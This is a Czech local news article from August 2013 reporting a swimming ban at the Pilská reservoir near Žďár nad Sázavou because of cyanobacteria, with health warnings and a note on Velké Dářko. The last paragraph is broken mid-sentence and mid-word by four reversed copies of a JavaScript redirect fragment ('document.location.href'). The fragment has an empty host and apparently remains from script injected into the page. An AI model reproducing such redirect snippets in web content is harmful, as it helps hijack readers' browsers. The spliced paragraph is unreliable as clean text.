Žďár nad Sázavou, aktuality, Pilská nádrž, zákaz koupání
Rainbow page separator

V Pilské nádrži byl vyhlášen zákaz koupání

Pondělí, 5. srpna 2013

pilak-zakaz-koupaniŽďár nad Sázavou / Zákaz koupání vyhlásili hygienici v Pilské nádrži u Žďáru nad Sázavou.Důvodem pro jejich rozhodnutí je výrazné překročení hygienického limitu vody pro množství sinic a chlorofylu.

Rekreantům tak po koupání v kontaminované vodě hrozí akutní poškození zdraví. Zdravotní problémy způsobené sinicemi se nejčastěji projevují kožní vyrážkou, různými alergickými projevy, žaludeční nevolností, zvracením, průjmy, horečkou či bolestmi hlavy.

Sinice se v horku rychle množí, navíc v Pilské nádrži byla snížena hladina vody kvůli aktuálně prováděné opravě hráze.

Voda nevhodná pro koupání je podle hygienických rozborů už i ve Velkém Dářku, které k rekreaci využívá řada lidí ze Žďáru i jeho okolí. I tam voda obsahuje velké množství [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toxických sinic a chlorofylu, nicméně zákaz koupání v té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to nádrži ještě vyhlášen nebyl. Největší riziko zdravotních komplikací tam po koupání hrozí těhotným ženám, alergikům či osobám s oslabeným imunitním systémem. Pokud se lidé v Dářku chtějí vykoupat, podle doporučení hygieniků se poté rozhodně nemají zapomenout osprchovat.